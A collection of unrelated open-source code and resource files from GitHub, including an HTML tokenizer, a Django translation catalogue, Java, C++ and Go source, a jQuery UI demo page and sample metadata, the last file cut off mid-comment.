self.currentToken["data"] += "-" + data
self.state = self.commentState
return True
def commentEndState(self):
data = self.stream.char()
if data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "--\uFFFD"
self.state = self.commentState
elif data == "!":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-bang-after-double-dash-in-comment"})
self.state = self.commentEndBangState
elif data == "-":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-dash-after-double-dash-in-comment"})
self.currentToken["data"] += data
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment-double-dash"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
# XXX
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-comment"})
self.currentToken["data"] += "--" + data
self.state = self.commentState
return True
def commentEndBangState(self):
data = self.stream.char()
if data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == "-":
self.currentToken["data"] += "--!"
self.state = self.commentEndDashState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "--!\uFFFD"
self.state = self.commentState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment-end-bang-state"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["data"] += "--!" + data
self.state = self.commentState
return True
def doctypeState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeDoctypeNameState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-doctype-name-but-got-eof"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"need-space-after-doctype"})
self.stream.unget(data)
self.state = self.beforeDoctypeNameState
return True
def beforeDoctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-doctype-name-but-got-right-bracket"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["name"] = "\uFFFD"
self.state = self.doctypeNameState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-doctype-name-but-got-eof"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["name"] = data
self.state = self.doctypeNameState
return True
def doctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower)
self.state = self.afterDoctypeNameState
elif data == ">":
self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower)
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["name"] += "\uFFFD"
self.state = self.doctypeNameState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype-name"})
self.currentToken["correct"] = False
self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower)
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["name"] += data
return True
def afterDoctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.currentToken["correct"] = False
self.stream.unget(data)
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
if data in ("p", "P"):
matched = True
for expected in (("u", "U"), ("b", "B"), ("l", "L"),
("i", "I"), ("c", "C")):
data = self.stream.char()
if data not in expected:
matched = False
break
if matched:
self.state = self.afterDoctypePublicKeywordState
return True
elif data in ("s", "S"):
matched = True
for expected in (("y", "Y"), ("s", "S"), ("t", "T"),
("e", "E"), ("m", "M")):
data = self.stream.char()
if data not in expected:
matched = False
break
if matched:
self.state = self.afterDoctypeSystemKeywordState
return True
# All the characters read before the current 'data' will be
# [a-zA-Z], so they're garbage in the bogus doctype and can be
# discarded; only the latest character might be '>' or EOF
# and needs to be ungetted
self.stream.unget(data)
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-space-or-right-bracket-in-doctype", "datavars":
{"data": data}})
self.currentToken["correct"] = False
self.state = self.bogusDoctypeState
return True
def afterDoctypePublicKeywordState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeDoctypePublicIdentifierState
elif data in ("'", '"'):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.stream.unget(data)
self.state = self.beforeDoctypePublicIdentifierState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.stream.unget(data)
self.state = self.beforeDoctypePublicIdentifierState
return True
def beforeDoctypePublicIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == "\"":
self.currentToken["publicId"] = ""
self.state = self.doctypePublicIdentifierDoubleQuotedState
elif data == "'":
self.currentToken["publicId"] = ""
self.state = self.doctypePublicIdentifierSingleQuotedState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.state = self.bogusDoctypeState
return True
def doctypePublicIdentifierDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.afterDoctypePublicIdentifierState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["publicId"] += "\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["publicId"] += data
return True
def doctypePublicIdentifierSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.afterDoctypePublicIdentifierState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["publicId"] += "\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["publicId"] += data
return True
def afterDoctypePublicIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.betweenDoctypePublicAndSystemIdentifiersState
elif data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == '"':
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierDoubleQuotedState
elif data == "'":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierSingleQuotedState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.state = self.bogusDoctypeState
return True
def betweenDoctypePublicAndSystemIdentifiersState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == '"':
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierDoubleQuotedState
elif data == "'":
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierSingleQuotedState
        elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.state = self.bogusDoctypeState
return True
def afterDoctypeSystemKeywordState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeDoctypeSystemIdentifierState
elif data in ("'", '"'):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.stream.unget(data)
self.state = self.beforeDoctypeSystemIdentifierState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.stream.unget(data)
self.state = self.beforeDoctypeSystemIdentifierState
return True
def beforeDoctypeSystemIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == "\"":
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierDoubleQuotedState
elif data == "'":
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierSingleQuotedState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.state = self.bogusDoctypeState
return True
def doctypeSystemIdentifierDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.afterDoctypeSystemIdentifierState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["systemId"] += "\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["systemId"] += data
return True
def doctypeSystemIdentifierSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.afterDoctypeSystemIdentifierState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["systemId"] += "\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["systemId"] += data
return True
def afterDoctypeSystemIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.state = self.bogusDoctypeState
return True
def bogusDoctypeState(self):
data = self.stream.char()
if data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
# XXX EMIT
self.stream.unget(data)
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
pass
return True
def cdataSectionState(self):
data = []
while True:
data.append(self.stream.charsUntil("]"))
data.append(self.stream.charsUntil(">"))
char = self.stream.char()
            if char is EOF:
break
else:
assert char == ">"
if data[-1][-2:] == "]]":
data[-1] = data[-1][:-2]
break
else:
data.append(char)
data = "".join(data) # pylint:disable=redefined-variable-type
# Deal with null here rather than in the parser
nullCount = data.count("\u0000")
if nullCount > 0:
for _ in range(nullCount):
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
data = data.replace("\u0000", "\uFFFD")
if data:
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": data})
self.state = self.dataState
return True
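# --- Editor's note: a minimal usage sketch (hypothetical; `tok` is assumed to
# be an HTMLTokenizer instance from this module). Each state method above
# consumes characters and returns True while tokenization should continue,
# queueing tokens on tok.tokenQueue (a deque) as a side effect; a driver
# simply drains the queue between state steps.
def _drive_tokenizer(tok):
    tok.state = tok.dataState
    while tok.state():
        while tok.tokenQueue:
            yield tok.tokenQueue.popleft()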
| {
"pile_set_name": "Github"
} |
# This file is distributed under the same license as the Django package.
#
# Translators:
# Nurlan Rakhimzhanov <[email protected]>, 2011
# yun_man_ger <[email protected]>, 2011
msgid ""
msgstr ""
"Project-Id-Version: django\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2017-01-19 16:49+0100\n"
"PO-Revision-Date: 2017-09-19 16:40+0000\n"
"Last-Translator: Jannis Leidel <[email protected]>\n"
"Language-Team: Kazakh (http://www.transifex.com/django/django/language/kk/)\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"Language: kk\n"
"Plural-Forms: nplurals=2; plural=(n!=1);\n"
msgid "Administrative Documentation"
msgstr ""
msgid "Home"
msgstr "Негізгі"
msgid "Documentation"
msgstr "Документация"
msgid "Bookmarklets"
msgstr "Букмарклеттер"
msgid "Documentation bookmarklets"
msgstr "Құжаттама букмарклеттері"
msgid ""
"To install bookmarklets, drag the link to your bookmarks toolbar, or right-"
"click the link and add it to your bookmarks. Now you can select the "
"bookmarklet from any page in the site."
msgstr ""
msgid "Documentation for this page"
msgstr "Бұл бетке арналған документация"
msgid ""
"Jumps you from any page to the documentation for the view that generates "
"that page."
msgstr ""
msgid "Tags"
msgstr ""
msgid "List of all the template tags and their functions."
msgstr ""
msgid "Filters"
msgstr ""
msgid ""
"Filters are actions which can be applied to variables in a template to alter "
"the output."
msgstr ""
msgid "Models"
msgstr ""
msgid ""
"Models are descriptions of all the objects in the system and their "
"associated fields. Each model has a list of fields which can be accessed as "
"template variables"
msgstr ""
msgid "Views"
msgstr ""
msgid ""
"Each page on the public site is generated by a view. The view defines which "
"template is used to generate the page and which objects are available to "
"that template."
msgstr ""
msgid "Tools for your browser to quickly access admin functionality."
msgstr ""
msgid "Please install docutils"
msgstr ""
#, python-format
msgid ""
"The admin documentation system requires Python's <a href=\"%(link)s"
"\">docutils</a> library."
msgstr ""
#, python-format
msgid ""
"Please ask your administrators to install <a href=\"%(link)s\">docutils</a>."
msgstr ""
#, python-format
msgid "Model: %(name)s"
msgstr ""
msgid "Fields"
msgstr ""
msgid "Field"
msgstr ""
msgid "Type"
msgstr ""
msgid "Description"
msgstr ""
msgid "Methods with arguments"
msgstr ""
msgid "Method"
msgstr ""
msgid "Arguments"
msgstr ""
msgid "Back to Model documentation"
msgstr ""
msgid "Model documentation"
msgstr ""
msgid "Model groups"
msgstr ""
msgid "Templates"
msgstr ""
#, python-format
msgid "Template: %(name)s"
msgstr ""
#, python-format
msgid "Template: \"%(name)s\""
msgstr ""
#. Translators: Search is not a verb here, it qualifies path (a search path)
#, python-format
msgid "Search path for template \"%(name)s\":"
msgstr ""
msgid "(does not exist)"
msgstr ""
msgid "Back to Documentation"
msgstr ""
msgid "Template filters"
msgstr ""
msgid "Template filter documentation"
msgstr ""
msgid "Built-in filters"
msgstr ""
#, python-format
msgid ""
"To use these filters, put <code>%(code)s</code> in your template before "
"using the filter."
msgstr ""
msgid "Template tags"
msgstr ""
msgid "Template tag documentation"
msgstr ""
msgid "Built-in tags"
msgstr ""
#, python-format
msgid ""
"To use these tags, put <code>%(code)s</code> in your template before using "
"the tag."
msgstr ""
#, python-format
msgid "View: %(name)s"
msgstr ""
msgid "Context:"
msgstr ""
msgid "Templates:"
msgstr ""
msgid "Back to View documentation"
msgstr ""
msgid "View documentation"
msgstr ""
msgid "Jump to namespace"
msgstr ""
msgid "Empty namespace"
msgstr ""
#, python-format
msgid "Views by namespace %(name)s"
msgstr ""
msgid "Views by empty namespace"
msgstr ""
#, python-format
msgid ""
"\n"
" View function: <code>%(full_name)s</code>. Name: <code>%(url_name)s</"
"code>.\n"
msgstr ""
msgid "tag:"
msgstr "тег:"
msgid "filter:"
msgstr "сүзгіш:"
msgid "view:"
msgstr "көрініс:"
#, python-format
msgid "App %(app_label)r not found"
msgstr ""
#, python-format
msgid "Model %(model_name)r not found in app %(app_label)r"
msgstr "%(app_label)r app ішінен %(model_name)r үлгісі табылмады"
msgid "model:"
msgstr "модель:"
#, python-format
msgid "the related `%(app_label)s.%(data_type)s` object"
msgstr "байланысты `%(app_label)s.%(data_type)s` объект"
#, python-format
msgid "related `%(app_label)s.%(object_name)s` objects"
msgstr "байланысты `%(app_label)s.%(object_name)s` объекттер"
#, python-format
msgid "all %s"
msgstr "барлық %s"
#, python-format
msgid "number of %s"
msgstr "%s саны"
#, python-format
msgid "%s does not appear to be a urlpattern object"
msgstr "%s urlpattern объектке ұқсамайды"
| {
"pile_set_name": "Github"
} |
// Copyright 2000-2020 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.
package com.intellij.psi.search;
import com.intellij.openapi.project.Project;
import org.jetbrains.annotations.NotNull;
/**
* A {@code VirtualFile} that needs to be included in a project scope.
*
* @author gregsh
*/
public interface ProjectAwareVirtualFile {
boolean isInProject(@NotNull Project project);
}
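// --- Editor's usage sketch (hypothetical helper, not part of the platform
// API): callers typically test for the interface before consulting it, e.g.
//
//   static boolean isInProjectScope(Project project, VirtualFile file) {
//       return file instanceof ProjectAwareVirtualFile
//               && ((ProjectAwareVirtualFile) file).isInProject(project);
//   }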
| {
"pile_set_name": "Github"
} |
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>jQuery UI Dialog - Modal confirmation</title>
<link rel="stylesheet" href="../../themes/base/jquery.ui.all.css">
<script src="../../jquery-1.9.1.js"></script>
<script src="../../ui/jquery.ui.core.js"></script>
<script src="../../ui/jquery.ui.widget.js"></script>
<script src="../../ui/jquery.ui.mouse.js"></script>
<script src="../../ui/jquery.ui.button.js"></script>
<script src="../../ui/jquery.ui.draggable.js"></script>
<script src="../../ui/jquery.ui.position.js"></script>
<script src="../../ui/jquery.ui.button.js"></script>
<script src="../../ui/jquery.ui.dialog.js"></script>
<link rel="stylesheet" href="../demos.css">
<script>
$(function() {
$( "#dialog-confirm" ).dialog({
resizable: false,
height:140,
modal: true,
buttons: {
"Delete all items": function() {
$( this ).dialog( "close" );
},
Cancel: function() {
$( this ).dialog( "close" );
}
}
});
});
</script>
</head>
<body>
<div id="dialog-confirm" title="Empty the recycle bin?">
<p><span class="ui-icon ui-icon-alert" style="float:left; margin:0 7px 20px 0;"></span>These items will be permanently deleted and cannot be recovered. Are you sure?</p>
</div>
<p>Sed vel diam id libero <a href="http://example.com">rutrum convallis</a>. Donec aliquet leo vel magna. Phasellus rhoncus faucibus ante. Etiam bibendum, enim faucibus aliquet rhoncus, arcu felis ultricies neque, sit amet auctor elit eros a lectus.</p>
<div class="demo-description">
<p>Confirm an action that may be destructive or important. Set the <code>modal</code> option to true, and specify primary and secondary user actions with the <code>buttons</code> option.</p>
</div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
//===--- TerminalDisplayUnix.h - Output To UNIX Terminal --------*- C++ -*-===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
//
// This file defines the interface for writing to a UNIX terminal. It tries to
// support all "common" terminal types.
//
// Axel Naumann <[email protected]>, 2011-05-12
//===----------------------------------------------------------------------===//
#ifndef TEXTINPUT_TERMINALDISPLAYUNIX_H
#define TEXTINPUT_TERMINALDISPLAYUNIX_H
#include <cstddef>
#include "textinput/TerminalDisplay.h"
namespace textinput {
class Color;
// Output to tty / pipe / file.
class TerminalDisplayUnix: public TerminalDisplay {
public:
TerminalDisplayUnix();
~TerminalDisplayUnix();
void HandleResizeSignal();
void Attach();
void Detach();
protected:
void MoveUp(size_t nLines = 1);
void MoveDown(size_t nLines = 1);
void MoveLeft(size_t nCols = 1);
void MoveRight(size_t nCols = 1);
void MoveInternal(char What, size_t n);
void MoveFront();
void SetColor(char CIdx, const Color& C);
void WriteRawString(const char* text, size_t len);
void ActOnEOL();
void EraseToRight();
int GetClosestColorIdx256(const Color& C);
int GetClosestColorIdx16(const Color& C);
private:
bool fIsAttached; // whether tty is configured
size_t fNColors; // number of colors supported by output
int fOutputID; // Prompt output file descriptor
};
}
#endif // TEXTINPUT_TERMINALDISPLAYUNIX_H
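// --- Editor's usage sketch (hypothetical; the display is normally driven by
// the TextInput library itself). Only the attach/detach lifecycle and the
// resize hook are public:
//
//   textinput::TerminalDisplayUnix Disp;
//   Disp.Attach();   // configure the tty for prompt output
//   // ... TextInput writes the prompt through the display ...
//   Disp.Detach();   // restore the previous terminal state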
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html>
<head>
<title>403 Forbidden</title>
</head>
<body>
<p>Directory access is forbidden.</p>
</body>
</html>
| {
"pile_set_name": "Github"
} |
// This file is distributed under the MIT license.
// See the LICENSE file for details.
#pragma once
#ifndef VSNRAY_MEDIUM_H
#define VSNRAY_MEDIUM_H 1
#include "phase_function.h"
#include "spectrum.h"
namespace visionaray
{
template <typename T>
class anisotropic_medium
{
public:
using scalar_type = T;
public:
template <typename U>
VSNRAY_FUNC
spectrum<U> tr(vector<3, U> const& wo, vector<3, U> const& wi)
{
return spectrum<U>(phase_.tr(wo, wi));
}
template <typename U, typename Generator>
VSNRAY_FUNC
spectrum<U> sample(vector<3, U> const& wo, vector<3, U>& wi, U& pdf, Generator& gen)
{
return spectrum<U>(phase_.sample(wo, wi, pdf, gen));
}
// Anisotropy in [-1.0..1.0], where -1.0 scatters all light backwards
T& anisotropy()
{
return phase_.g;
}
// Anisotropy in [-1.0..1.0], where -1.0 scatters all light backwards
VSNRAY_FUNC T const& anisotropy() const
{
return phase_.g;
}
private:
henyey_greenstein<T> phase_;
};
} // visionaray
#endif // VSNRAY_MEDIUM_H
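// --- Editor's usage sketch (hypothetical wo/wi/gen supplied by the caller's
// integrator loop): set the Henyey-Greenstein anisotropy, then sample a
// scattering direction and obtain the associated throughput and pdf.
//
//   visionaray::anisotropic_medium<float> medium;
//   medium.anisotropy() = 0.3f;                  // mostly forward scattering
//   float pdf = 0.0f;
//   spectrum<float> tr = medium.sample(wo, wi, pdf, gen);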
| {
"pile_set_name": "Github"
} |
/**
*
*/
package com.imooc.security.core.social.qq.api;
import org.apache.commons.lang.StringUtils;
import org.springframework.social.oauth2.AbstractOAuth2ApiBinding;
import org.springframework.social.oauth2.TokenStrategy;
import com.fasterxml.jackson.databind.ObjectMapper;
/**
* @author zhailiang
*
*/
public class QQImpl extends AbstractOAuth2ApiBinding implements QQ {
private static final String URL_GET_OPENID = "https://graph.qq.com/oauth2.0/me?access_token=%s";
private static final String URL_GET_USERINFO = "https://graph.qq.com/user/get_user_info?oauth_consumer_key=%s&openid=%s";
private String appId;
private String openId;
private ObjectMapper objectMapper = new ObjectMapper();
public QQImpl(String accessToken, String appId) {
super(accessToken, TokenStrategy.ACCESS_TOKEN_PARAMETER);
this.appId = appId;
String url = String.format(URL_GET_OPENID, accessToken);
String result = getRestTemplate().getForObject(url, String.class);
System.out.println(result);
this.openId = StringUtils.substringBetween(result, "\"openid\":\"", "\"}");
}
/* (non-Javadoc)
* @see com.imooc.security.core.social.qq.api.QQ#getUserInfo()
*/
@Override
public QQUserInfo getUserInfo() {
String url = String.format(URL_GET_USERINFO, appId, openId);
String result = getRestTemplate().getForObject(url, String.class);
System.out.println(result);
QQUserInfo userInfo = null;
try {
userInfo = objectMapper.readValue(result, QQUserInfo.class);
userInfo.setOpenId(openId);
return userInfo;
} catch (Exception e) {
throw new RuntimeException("获取用户信息失败", e);
}
}
}
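// --- Editor's usage sketch (hypothetical accessToken/appId values; in a real
// application the binding is created per connection by a Spring Social
// ServiceProvider rather than constructed directly):
//
//   QQ qq = new QQImpl(accessToken, appId);
//   QQUserInfo userInfo = qq.getUserInfo();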
| {
"pile_set_name": "Github"
} |
# frozen_string_literal: true
require "test_helper"
class FormCore::Test < ActiveSupport::TestCase
test "truth" do
assert_kind_of Module, FormCore
end
end
| {
"pile_set_name": "Github"
} |
package org.standardnotes.notes.comms.data;
import java.util.ArrayList;
import java.util.List;
import javax.annotation.Generated;
import com.google.gson.annotations.Expose;
import com.google.gson.annotations.SerializedName;
/**
*
* <p>
*
*
*/
@Generated("org.jsonschema2pojo")
public class NoteContent {
@SerializedName("title")
@Expose
private String title = "";
@SerializedName("text")
@Expose
private String text = "";
@SerializedName("references")
@Expose
private List<Reference> references = new ArrayList<Reference>();
/**
*
* @return
* The title
*/
public String getTitle() {
return title;
}
/**
*
* @param title
* The title
*/
public void setTitle(String title) {
this.title = title;
}
/**
*
* @return
* The text
*/
public String getText() {
return text;
}
/**
*
* @param text
* The text
*/
public void setText(String text) {
this.text = text;
}
/**
*
* @return
* The references
*/
public List<Reference> getReferences() {
return references;
}
/**
*
* @param references
* The references
*/
public void setReferences(List<Reference> references) {
this.references = references;
}
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<SampleMetadata>
<ID>EC6AC243-478A-4BC3-B456-7D6D81E19EA3</ID>
<Brief>Sample code for the Xamarin watchOS Complications documentation.</Brief>
<IsFullApplication>false</IsFullApplication>
<Level>Beginner</Level>
<Tags>iOS10, Watch, User Interface, Getting Started</Tags>
<SupportedPlatforms>iOS</SupportedPlatforms>
<Gallery>true</Gallery>
<MinimumLicenseRequirement>Starter</MinimumLicenseRequirement>
<Description>Sample code for the Xamarin watchOS Complication documentation, demonstrating how to add a complication to the watch face.</Description>
</SampleMetadata>
| {
"pile_set_name": "Github"
} |
// Copyright 2015 Matthew Holt
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package certmagic
import (
"crypto/tls"
"crypto/x509"
"fmt"
"io/ioutil"
"net"
"strings"
"time"
"go.uber.org/zap"
"golang.org/x/crypto/ocsp"
)
// Certificate is a tls.Certificate with associated metadata tacked on.
// Even if the metadata can be obtained by parsing the certificate,
// we are more efficient by extracting the metadata onto this struct,
// but at the cost of slightly higher memory use.
type Certificate struct {
tls.Certificate
// Names is the list of subject names this
// certificate is signed for.
Names []string
// Optional; user-provided, and arbitrary.
Tags []string
// OCSP contains the certificate's parsed OCSP response.
ocsp *ocsp.Response
// The hex-encoded hash of this cert's chain's bytes.
hash string
// Whether this certificate is under our management
managed bool
}
// NeedsRenewal returns true if the certificate is
// expiring soon (according to cfg) or has expired.
func (cert Certificate) NeedsRenewal(cfg *Config) bool {
return currentlyInRenewalWindow(cert.Leaf.NotBefore, cert.Leaf.NotAfter, cfg.RenewalWindowRatio)
}
// Expired returns true if the certificate has expired.
func (cert Certificate) Expired() bool {
if cert.Leaf == nil {
// ideally cert.Leaf would never be nil, but this can happen for
// "synthetic" certs like those made to solve the TLS-ALPN challenge
// which adds a special cert directly to the cache, since
// tls.X509KeyPair() discards the leaf; oh well
return false
}
return time.Now().After(cert.Leaf.NotAfter)
}
// currentlyInRenewalWindow returns true if the current time is
// within the renewal window, according to the given start/end
// dates and the ratio of the renewal window. If true is returned,
// the certificate being considered is due for renewal.
func currentlyInRenewalWindow(notBefore, notAfter time.Time, renewalWindowRatio float64) bool {
if notAfter.IsZero() {
return false
}
lifetime := notAfter.Sub(notBefore)
if renewalWindowRatio == 0 {
renewalWindowRatio = DefaultRenewalWindowRatio
}
renewalWindow := time.Duration(float64(lifetime) * renewalWindowRatio)
renewalWindowStart := notAfter.Add(-renewalWindow)
return time.Now().After(renewalWindowStart)
}
// HasTag returns true if cert.Tags has tag.
func (cert Certificate) HasTag(tag string) bool {
for _, t := range cert.Tags {
if t == tag {
return true
}
}
return false
}
// CacheManagedCertificate loads the certificate for domain into the
// cache, from the TLS storage for managed certificates. It returns a
